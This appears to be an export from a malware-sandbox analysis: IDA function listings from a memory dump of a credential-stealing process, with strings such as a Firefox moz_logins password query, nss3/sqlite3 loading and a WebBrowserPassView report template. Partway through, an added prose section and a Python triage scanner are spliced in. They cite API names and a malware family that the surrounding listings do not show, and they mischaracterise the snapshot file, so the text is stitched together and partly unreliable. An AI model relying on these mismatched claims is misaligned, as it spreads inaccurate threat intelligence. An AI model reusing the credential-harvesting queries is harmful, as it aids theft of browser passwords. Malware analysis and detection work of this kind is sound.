• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: memset$_snwprintf$FileWritewcscpywcslen
• String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>$WebBrowserPassView
• API String ID: 2731979376-1376879643
• Opcode ID: f8e001787c2363cba2026e3d3c8ba2c251a00b45d532011988efd28241eb9acd
• Instruction ID: ae32d01ec2d3a7685ec326ba9a70c170c8059c8ae6e66fa8bd15e07dd33865c2
• Opcode Fuzzy Hash: f8e001787c2363cba2026e3d3c8ba2c251a00b45d532011988efd28241eb9acd
• Instruction Fuzzy Hash: 2E217672D002187ADB21AF55DC41FEA76BCEB08785F0040AFF509A6191DA799F848F69
Uniqueness
Uniqueness Score: -1.00%

APIs
• SetBkMode.GDI32(?,00000001), ref: 0040DE90
• SetTextColor.GDI32(?,00FF0000), ref: 0040DE9E
• SelectObject.GDI32(?,?), ref: 0040DEB3
• DrawTextExW.USER32(?,?,000000FF,?,00000004,?), ref: 0040DEE9
• SelectObject.GDI32(00000014,00000000), ref: 0040DEF3
• GetModuleHandleW.KERNEL32(00000000), ref: 0040DF0E
• LoadCursorW.USER32(00000000,00000067), ref: 0040DF17
• SetCursor.USER32(00000000), ref: 0040DF1E
• PostMessageW.USER32(?,00000428,00000000,00000000), ref: 0040DF64
Strings
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: CursorObjectSelectText$ColorDrawHandleLoadMessageModeModulePost
• String ID: WebBrowserPassView
• API String ID: 101102110-2171583229
• Opcode ID: d30b9dbd8ebc4ebaeb5335cce5274ca5fb8e94d47e078bea0be9f04dbaba8f28
• Instruction ID: 5844c3f8be721e5f4358c4987d475350c1bb70f51af30b4dfd416207439779ca
• Opcode Fuzzy Hash: d30b9dbd8ebc4ebaeb5335cce5274ca5fb8e94d47e078bea0be9f04dbaba8f28
• Instruction Fuzzy Hash: D451D431A00206ABDB10AFA4C845F6AB7A6BF44315F20853AF507B72E0C779AD15DB99
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,004094E9,?,?,00409553,00000000), ref: 0040933D
  • Part of subcall function 00407BD1: SetFilePointer.KERNEL32(00409553,?,00000000,00000000,?,0040935E,00000000,00000000,?,00000020,?,004094E9,?,?,00409553,00000000), ref: 00407BDE
• GetFileSize.KERNEL32(00000000,00000000), ref: 0040936D
  • Part of subcall function 0040928C: _memicmp.MSVCRT ref: 004092A6
  • Part of subcall function 0040928C: memcpy.MSVCRT ref: 004092BD
• memcpy.MSVCRT ref: 004093B4
• strchr.MSVCRT ref: 004093D9
• strchr.MSVCRT ref: 004093EA
• _strlwr.MSVCRT ref: 004093F8
• memset.MSVCRT ref: 00409413
• CloseHandle.KERNEL32(00000000), ref: 00409460
Strings
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
• String ID: 4$h
• API String ID: 4066021378-1856150674
• Opcode ID: 5c9b1e76fbe1022800f84db5655dab790c3d9ef423dba09cd133e7d04b6bc347
• Instruction ID: cde85974a53443ad19b2097b399cb4fe7e1f14935bf37b0ef0624c00476b394c
• Opcode Fuzzy Hash: 5c9b1e76fbe1022800f84db5655dab790c3d9ef423dba09cd133e7d04b6bc347
• Instruction Fuzzy Hash: 333186B1900118BEEB11EB54CC85BEE77ACEF04358F10406AFA08E6181D7789F558B69
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: memset$_snwprintf
• String ID: %%0.%df
• API String ID: 3473751417-763548558
• Opcode ID: 4b41fd37f03522ed39b57e73efbb1f6ad9b07295744d2b5ffc828d63613b1bc3
• Instruction ID: 8dc9084977ea8e099579ef4c9ca95b08d60ceca6feee4e1064a0b0e4f5e47a8f
• Opcode Fuzzy Hash: 4b41fd37f03522ed39b57e73efbb1f6ad9b07295744d2b5ffc828d63613b1bc3
• Instruction Fuzzy Hash: 79313E71800229BAEB20DF55DC85FEBBBBCFF49308F4000EAB609A2151D7749B94CB65
Uniqueness
Uniqueness Score: -1.00%

APIs
• wcschr.MSVCRT ref: 00410E0E
• wcscpy.MSVCRT ref: 00410E1E
  • Part of subcall function 00407278: wcslen.MSVCRT ref: 00407287
  • Part of subcall function 00407278: wcslen.MSVCRT ref: 00407291
  • Part of subcall function 00407278: _memicmp.MSVCRT ref: 004072AC
• wcscpy.MSVCRT ref: 00410E6D
• wcscat.MSVCRT ref: 00410E78
• memset.MSVCRT ref: 00410E54
  • Part of subcall function 00407723: GetWindowsDirectoryW.KERNEL32(00451698,00000104,?,00410EAD,?,?,00000000,00000208,?), ref: 00407739
  • Part of subcall function 00407723: wcscpy.MSVCRT ref: 00407749
• memset.MSVCRT ref: 00410E9C
• memcpy.MSVCRT ref: 00410EB7
• wcscat.MSVCRT ref: 00410EC3
Strings
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
• String ID: \systemroot
• API String ID: 4173585201-1821301763
• Opcode ID: a0bd60bd2b0e165453e177ad0a7c90215dc3e7af33d93e9088b0359243bc96d3
• Instruction ID: 1a8d2db1a324573a28d88b24eeb1ed9c65cf0fc221c6a4ee7099d5d8ca3d40a6
• Opcode Fuzzy Hash: a0bd60bd2b0e165453e177ad0a7c90215dc3e7af33d93e9088b0359243bc96d3
• Instruction Fuzzy Hash: B121F9B280530479E621E7628D86EEB63EC9F05754F60455FF119E2082FABCA6C58B1E
Uniqueness
Uniqueness Score: -1.00%

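The function listings above each pair a String ID with an API ID, and the string sets are what give the capability away: the Toolhelp walk (CreateToolhelp32Snapshot, Module32First/Next, Process32First/Next) that the report ties to its sandbox-detection signature, the advapi32.dll Credential Manager names (CredEnumerateA/W, CredReadA, CredFree) resolved through GetProcAddress, the WebBrowserPassView HTML report template with its nirsoft.net link, and further down the sqlite3_open/sqlite3_prepare pair fetched from a sqlite3 library loaded with LoadLibraryExW. The following is an added example of my own, not code from the Joe Sandbox report, from HawkEye or from NirSoft: it turns those clusters into a small triage scanner that can be run offline over a raw memory dump such as the one the report names (hcaresult_14_2_400000_vbc.jbxd). The cluster labels, the 0.8 coverage threshold and SAMPLE_DUMP are constructed for the demonstration; the API and string names themselves are the ones on this page.

```python
"""Capability triage over a process memory dump.

Added example (not part of the Joe Sandbox report): the API-name and string
clusters are taken from the function listings on this page; the cluster
labels, the coverage threshold and SAMPLE_DUMP are constructed for the demo.
"""
from __future__ import annotations

import re

# Each cluster is the set of names that, seen together, indicate one capability.
# Requiring most of the set rather than a single name keeps a benign process
# enumerator (Process32First alone) from being flagged as a credential stealer.
CAPABILITIES: dict[str, set[str]] = {
    # Toolhelp walk of processes/modules, used to look for analysis tools
    "module_enum_toolhelp": {
        "CreateToolhelp32Snapshot", "Module32First", "Module32Next",
        "Process32First", "Process32Next",
    },
    # advapi32 Credential Manager API resolved at runtime via GetProcAddress
    "credman_harvest": {
        "advapi32.dll", "CredEnumerateA", "CredEnumerateW", "CredReadA", "CredFree",
    },
    # sqlite3 loaded with LoadLibraryExW to read browser credential databases
    "browser_sqlite": {"sqlite3_open", "sqlite3_prepare"},
    # NirSoft WebBrowserPassView HTML report template
    "nirsoft_html_report": {"WebBrowserPassView", "nirsoft.net"},
}


def find_strings(blob: bytes, min_len: int = 5) -> set[str]:
    """Extract printable ASCII and UTF-16LE strings of at least min_len chars."""
    ascii_re = rb"[\x20-\x7e]{%d,}" % min_len
    found = {m.group().decode("ascii") for m in re.finditer(ascii_re, blob)}
    # Wide strings: LoadLibraryW and the NirSoft code use UTF-16LE literals.
    utf16_re = rb"(?:[\x20-\x7e]\x00){%d,}" % min_len
    found |= {m.group().decode("utf-16-le") for m in re.finditer(utf16_re, blob)}
    return found


def assess(blob: bytes) -> dict[str, dict]:
    """Report, per cluster, which names were found and the fraction covered."""
    strings = find_strings(blob)
    report = {}
    for cap, names in CAPABILITIES.items():
        # Substring match: "nirsoft.net" sits inside a longer HTML template string.
        hits = sorted(n for n in names if any(n in s for s in strings))
        report[cap] = {"hits": hits, "coverage": len(hits) / len(names)}
    return report


def triage(blob: bytes, threshold: float = 0.8) -> list[str]:
    """Return the capabilities whose cluster coverage meets the threshold."""
    return [cap for cap, r in assess(blob).items() if r["coverage"] >= threshold]


# Constructed stand-in for a dump such as hcaresult_14_2_400000_vbc.jbxd:
# NUL-separated import names, two wide strings, and a deliberately
# incomplete sqlite cluster (sqlite3_prepare missing) to exercise the threshold.
SAMPLE_DUMP = (
    b"\x00" * 16
    + b"kernel32.dll\x00CreateToolhelp32Snapshot\x00Module32First\x00Module32Next\x00"
    + b"Process32First\x00Process32Next\x00"
    + "advapi32.dll".encode("utf-16-le") + b"\x00\x00"
    + b"CredReadA\x00CredFree\x00CredDeleteA\x00CredEnumerateA\x00CredEnumerateW\x00"
    + b'<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>\x00'
    + "WebBrowserPassView".encode("utf-16-le") + b"\x00\x00"
    + b"sqlite3_open\x00"
    + b"\x90" * 32
)

if __name__ == "__main__":
    for cap, r in assess(SAMPLE_DUMP).items():
        print(f"{cap:24s} {r['coverage']:.0%}  {r['hits']}")
    print("flagged:", triage(SAMPLE_DUMP))
```

On the constructed dump the Toolhelp, Credential Manager and NirSoft-report clusters are flagged, while the sqlite cluster stays at 50% coverage and is reported but not flagged; a dump containing only Process32First/Next scores 40% on the Toolhelp cluster and is not flagged either. To use it on a real dump, replace SAMPLE_DUMP with the bytes of the .sdmp or .jbxd file; the same cluster idea carries over directly into a YARA rule that requires N of the strings in each set.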
APIs
  • Part of subcall function 00441975: memset.MSVCRT ref: 004419A0
  • Part of subcall function 00441975: wcscpy.MSVCRT ref: 004419B7
  • Part of subcall function 00441975: memset.MSVCRT ref: 004419EA
  • Part of subcall function 00441975: wcscpy.MSVCRT ref: 00441A00
  • Part of subcall function 00441975: wcscat.MSVCRT ref: 00441A11
  • Part of subcall function 00441975: wcscpy.MSVCRT ref: 00441A37
  • Part of subcall function 00441975: wcscat.MSVCRT ref: 00441A48
  • Part of subcall function 00441975: wcscpy.MSVCRT ref: 00441A6F
  • Part of subcall function 00441975: wcscat.MSVCRT ref: 00441A80
  • Part of subcall function 00441975: GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,00000000), ref: 00441A8F
  • Part of subcall function 00441975: LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,?,?,?,?,00000104,00000000), ref: 00441AA6
  • Part of subcall function 00441975: GetProcAddress.KERNEL32(?,sqlite3_open), ref: 00441AF3
  • Part of subcall function 00441975: GetProcAddress.KERNEL32(?,sqlite3_prepare), ref: 00441AFF
• memset.MSVCRT ref: 004069BD
  • Part of subcall function 00407DC0: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,004028DC,?,?,00000003,00000000,00000000), ref: 00407DD9
• memset.MSVCRT ref: 00406A3C
• memset.MSVCRT ref: 00406A51
• strcpy.MSVCRT(?,00000000,?,00000002,?,00000005,?,00000004,?,00000007,?,00000006,?,00000001), ref: 00406AC4
• strcpy.MSVCRT(?,?,?,00000002,?,00000005,?,00000004,?,00000007,?,00000006,?,00000001), ref: 00406ADA
• strcpy.MSVCRT(?,?,?,00000002,?,00000005,?,00000004,?,00000007,?,00000006,?,00000001), ref: 00406AF0
• strcpy.MSVCRT(?,?,?,00000002,?,00000005,?,00000004,?,00000007,?,00000006,?,00000001), ref: 00406B06
• strcpy.MSVCRT(?,?,?,00000002,?,00000005,?,00000004,?,00000007,?,00000006,?,00000001), ref: 00406B1C
• strcpy.MSVCRT(?,?,?,00000002,?,00000005,?,00000004,?,00000007,?,00000006,?,00000001), ref: 00406B32
• memset.MSVCRT ref: 00406B48
Strings
• SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins, xrefs: 00406A03
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: memsetstrcpy$wcscpy$wcscat$AddressProc$ByteCharHandleLibraryLoadModuleMultiWide
• String ID: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins
• API String ID: 2096775815-1740008135
• Opcode ID: 8192c0fe8ba549a976583856fdff13a2ed89254f8bdc8aa75337d2af27a32240
• Instruction ID: 0d09ea3875aa138d6f02baa8234f1932a31c53e7e6ecd19b10853a161b4d72d0
• Opcode Fuzzy Hash: 8192c0fe8ba549a976583856fdff13a2ed89254f8bdc8aa75337d2af27a32240
• Instruction Fuzzy Hash: 6D61E9B2C0421EEEDF11AF91DC419DEBBB8EF04314F10406BF505B2191EA79AA94CF69
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00414BCA: GetVersionExW.KERNEL32(?), ref: 00414BED
• GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 00415EDB
• malloc.MSVCRT ref: 00415EE6
• free.MSVCRT(?), ref: 00415EF6
• GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00415F0A
• free.MSVCRT(?), ref: 00415F0F
• GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 00415F25
• malloc.MSVCRT ref: 00415F2D
• GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00415F40
• free.MSVCRT(?), ref: 00415F45
• free.MSVCRT(?), ref: 00415F59
• free.MSVCRT(00000000,0044A338,00000000), ref: 00415F78
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: free$FullNamePath$malloc$Version
• String ID:
• API String ID: 3356672799-0
• Opcode ID: 921d0a7259a897f213f630380232b9b221bbaa70b4d2ef9e6fc0aaee11bddb4f
• Instruction ID: 788494e2a8c2de429da1840323bde4c0a518de2f45811afbb62912a9d7d550b6
• Opcode Fuzzy Hash: 921d0a7259a897f213f630380232b9b221bbaa70b4d2ef9e6fc0aaee11bddb4f
• Instruction Fuzzy Hash: F321CB71900108FFEB117FA5DD46CDFBBA9DF80368B20007BF404A2160EA785F809568
Uniqueness

Uniqueness Score: -1.00%

APIs
• EmptyClipboard.USER32 ref: 0040736D
  • Part of subcall function 00407144: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,004421F7,00000000,?,00000000,00000000,00410671,?,?), ref: 00407156
• GetFileSize.KERNEL32(00000000,00000000), ref: 0040738A
• GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040739B
• GlobalLock.KERNEL32 ref: 004073A8
• ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 004073BB
• GlobalUnlock.KERNEL32(00000000), ref: 004073CD
• SetClipboardData.USER32 ref: 004073D6
• GetLastError.KERNEL32 ref: 004073DE
• CloseHandle.KERNEL32(?), ref: 004073EA
• GetLastError.KERNEL32 ref: 004073F5
• CloseClipboard.USER32 ref: 004073FE
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
• String ID:
• API String ID: 3604893535-0
• Opcode ID: ff4ef1d92d1a290ea301bbc8eaca8dcb04474945f762c75d88d1861bbfd53786
• Instruction ID: 70226e125eefff96fe42492f97b8668800667adb6f1e94a7dd2fd5f696112ff0
• Opcode Fuzzy Hash: ff4ef1d92d1a290ea301bbc8eaca8dcb04474945f762c75d88d1861bbfd53786
• Instruction Fuzzy Hash: E311423A904204FBE7105FB5EC4DA5E7F78EB06B52F204176FD02E5290DB749A01DB69
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: wcscpy
• String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
• API String ID: 1284135714-318151290
• Opcode ID: 765507c601b4d8d2ba7194c2d8328fe19790b608763020fa3010f04483565392
• Instruction ID: 454bece2ea24cac32075296694d9d3cbfc4d611bf65854eebe1c10393ee0200f
• Opcode Fuzzy Hash: 765507c601b4d8d2ba7194c2d8328fe19790b608763020fa3010f04483565392
• Instruction Fuzzy Hash: 46F01D3329C746A0383D09680B06AFF1001E2127497B585D3A882E06D5C8FDCEF2F81F
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
• String ID: 0$6
• API String ID: 4066108131-3849865405
• Opcode ID: 1d39bbd5ff858052ee02b08f17fe13160222b35be18e4d09e9b30479f4b91e1d
• Instruction ID: 34000a492db7a65727c4d20bf870b817f1c48c155544aae5e12c30b4e9d7c158
• Opcode Fuzzy Hash: 1d39bbd5ff858052ee02b08f17fe13160222b35be18e4d09e9b30479f4b91e1d
• Instruction Fuzzy Hash: 64318B72408340AFDB20DF91D845A9BB7E8FF84354F00497EF948A2291E37ADA14CB5B
Uniqueness

Uniqueness Score: -1.00%

APIs
• LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040E305,00000000), ref: 00403945
• GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00403957
• FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040E305,00000000), ref: 0040396B
• #17.COMCTL32(?,00000002,?,?,?,0040E305,00000000), ref: 00403979
• MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00403996
Strings
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: Library$AddressFreeLoadMessageProc
• String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
• API String ID: 2780580303-317687271
• Opcode ID: 60c968a06818d841dc3f94f16557b2d6df9d0dbd22d8837fd1ebe6fbdb2c419c
• Instruction ID: dc7e95600dee0bf6daca19896d95929b9e7fb1f9fe7c184dfd563e32ea829a14
• Opcode Fuzzy Hash: 60c968a06818d841dc3f94f16557b2d6df9d0dbd22d8837fd1ebe6fbdb2c419c
• Instruction Fuzzy Hash: 8501D1B67502117BE3111FB49C89B6B7EACDB42F4BB100139B502F2280DBB8CF05869C
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNEL32(nss3.dll,00000000,?,?,751457F0,0040FC10,?,?,?,?,?,00000000), ref: 0040FAC9
• GetModuleHandleW.KERNEL32(sqlite3.dll,?,751457F0,0040FC10,?,?,?,?,?,00000000), ref: 0040FAD2
• GetModuleHandleW.KERNEL32(mozsqlite3.dll,?,751457F0,0040FC10,?,?,?,?,?,00000000), ref: 0040FADB
• FreeLibrary.KERNEL32(00000000,?,751457F0,0040FC10,?,?,?,?,?,00000000), ref: 0040FAEA
• FreeLibrary.KERNEL32(00000000,?,751457F0,0040FC10,?,?,?,?,?,00000000), ref: 0040FAF1
• FreeLibrary.KERNEL32(00000000,?,751457F0,0040FC10,?,?,?,?,?,00000000), ref: 0040FAF8
Strings
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: FreeHandleLibraryModule
• String ID: mozsqlite3.dll$nss3.dll$sqlite3.dll
• API String ID: 662261464-3550686275
• Opcode ID: d0d754f8fa980613d90b85c052ffa4ec5d0d6696dd4c8834489f6bf69c2357b0
                                                                                                                                                    • Instruction ID: c5d69885cf2e3d5474ff6b38c23ba8038bf1212ac087c8b68f6824d90ef94812
                                                                                                                                                    • Opcode Fuzzy Hash: d0d754f8fa980613d90b85c052ffa4ec5d0d6696dd4c8834489f6bf69c2357b0
                                                                                                                                                    • Instruction Fuzzy Hash: 1AE0D816B0132E669E2067F16C44D1B7E5CC892AE53150037A904A32408DEC5C0599F8

Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd

Similarity
• API ID: memcpy$memchrmemset
• String ID: G"D$G"D
• API String ID: 1581201632-2001841848
• Opcode ID: 7575a319fd1e5a0cf748581ae524368e3baf011f309bc42e4df5649906151b93
• Instruction ID: 18be241936230d761fb3e4c1ab226db0ef0f42d77396bda2a3194a4a2a5a8e65
• Opcode Fuzzy Hash: 7575a319fd1e5a0cf748581ae524368e3baf011f309bc42e4df5649906151b93
• Instruction Fuzzy Hash: CE51E671900219ABDB10EF65CD85EEEB7BCAF44304F44446BFA49D7141E778EA48CB64

Uniqueness
Uniqueness Score: -1.00%

APIs
• GetSystemMetrics.USER32 ref: 004078A9
• GetSystemMetrics.USER32 ref: 004078AF
• GetDC.USER32(00000000), ref: 004078BC
• GetDeviceCaps.GDI32(00000000,00000008), ref: 004078CD
• GetDeviceCaps.GDI32(00000000,0000000A), ref: 004078D4
• ReleaseDC.USER32 ref: 004078DB
• GetWindowRect.USER32 ref: 004078EE
• GetParent.USER32(?), ref: 004078F3
• GetWindowRect.USER32 ref: 00407910
• MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040796F

Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd

Similarity
• API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
• String ID:
• API String ID: 2163313125-0
• Opcode ID: 27c47932f92ae397c529d5322f361d1abbe154fe8b4fd6afae4dd3e0e48430fe
• Instruction ID: 40da1e460122d0dbc2375826a99d02d2520f98ce936ed6642694246a0da552c1
• Opcode Fuzzy Hash: 27c47932f92ae397c529d5322f361d1abbe154fe8b4fd6afae4dd3e0e48430fe
• Instruction Fuzzy Hash: D3318176A00209AFDB04DFB8CC85AEEBBB9FB48351F150175E901F3290DA70AE418B50

Uniqueness
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 00406878
• memset.MSVCRT ref: 0040688C
• strcpy.MSVCRT(?), ref: 004068A6
• strcpy.MSVCRT(?,?,?,?,?,?), ref: 004068EB
• strcpy.MSVCRT(?,00001000,?,?,?,?,?,?), ref: 004068FF
• strcpy.MSVCRT(?,?,?,00001000,?,?,?,?,?,?), ref: 00406912
• wcscpy.MSVCRT ref: 00406921
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,?,?,?,?,?,?,?,?,Rp@,00406D64), ref: 00406948
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,?,?,?,?,?,?,?,?,Rp@,00406D64), ref: 0040695E

Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd

Similarity
• API ID: strcpy$ByteCharMultiWidememset$wcscpy
• String ID: Rp@
• API String ID: 4248099071-3382320042
• Opcode ID: 671e59c8fe4c17755a702227dbfb0f671c225521712c780855f09c1fc1980107
• Instruction ID: 073529020724e05d4964247b7c64433db30515fb9166064be710f6d7ccb76f44
• Opcode Fuzzy Hash: 671e59c8fe4c17755a702227dbfb0f671c225521712c780855f09c1fc1980107
• Instruction Fuzzy Hash: 653141B290011DBFDB20DA55CC84FEA77BCFF09358F0445AAB919E3141DA74AA588F68

Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd

Similarity
• API ID: free$wcslen
• String ID:
• API String ID: 3592753638-3916222277
• Opcode ID: a6abcb691fd1dabd2973f99fa54c7fcc296b45a854174555a7bdb068922a3314
• Instruction ID: 27dbad6a18cb5119fe9557e6abee58e32c1211c22f38b2cca10356837960f856
• Opcode Fuzzy Hash: a6abcb691fd1dabd2973f99fa54c7fcc296b45a854174555a7bdb068922a3314
• Instruction Fuzzy Hash: DA615770C0811AEBEF189F95E6895AEB771FF04305F60847FE442B62E0DBB84981CB59

Uniqueness
Uniqueness Score: -1.00%

APIs
• LoadMenuW.USER32 ref: 0040A83F
  • Part of subcall function 0040A668: GetMenuItemCount.USER32 ref: 0040A67E
  • Part of subcall function 0040A668: memset.MSVCRT ref: 0040A69D
  • Part of subcall function 0040A668: GetMenuItemInfoW.USER32 ref: 0040A6D9
  • Part of subcall function 0040A668: wcschr.MSVCRT ref: 0040A6F1
• DestroyMenu.USER32(00000000), ref: 0040A85D
• CreateDialogParamW.USER32 ref: 0040A8AB
• memset.MSVCRT ref: 0040A8C7
• GetWindowTextW.USER32 ref: 0040A8DC
• EnumChildWindows.USER32 ref: 0040A907
• DestroyWindow.USER32(00000000), ref: 0040A90E
  • Part of subcall function 0040A497: _snwprintf.MSVCRT ref: 0040A4BC

Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd

Similarity
• API ID: Menu$DestroyItemWindowmemset$ChildCountCreateDialogEnumInfoLoadParamTextWindows_snwprintfwcschr
• String ID: caption
• API String ID: 1928666178-4135340389
• Opcode ID: 2a735e7d3e9f25f5000f535f47a02417f98db50f76fb95be89fb06d3c5800170
• Instruction ID: 1ee1ed61ad6e464c94b1b5c04ceaba47984998c4c5bccbb9cf540d7a9e91c68f
• Opcode Fuzzy Hash: 2a735e7d3e9f25f5000f535f47a02417f98db50f76fb95be89fb06d3c5800170
• Instruction Fuzzy Hash: 4C21B472100314BBDB11AF50DC49BAF3B78FF45751F148436F905A5191D7788AA0CB6A

Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd

Similarity
• API ID: memcpywcslen$_snwprintfmemset
• String ID: %s (%s)$G@
• API String ID: 3979103747-4021399728
• Opcode ID: f04d55ffe867956f13ff29a0b22ee26a635b57cfc1c306c95c53cfde12d0b5a1
• Instruction ID: 7020ae682d4dad294ec7254b180182bae2c538f47323e789ebcab58d633c0506
• Opcode Fuzzy Hash: f04d55ffe867956f13ff29a0b22ee26a635b57cfc1c306c95c53cfde12d0b5a1
• Instruction Fuzzy Hash: 58215E72900219BBDF21DF95CD4599BB7B8BF04358F40846AF948AB201EB74EA188BD4

Uniqueness
Uniqueness Score: -1.00%

APIs
• LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,004071E5,?,00000000,?,0040C6FE,00000000), ref: 004070E4
• FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,004071E5,?,00000000,?,0040C6FE), ref: 00407102
• wcslen.MSVCRT ref: 0040710F
• wcscpy.MSVCRT ref: 0040711F
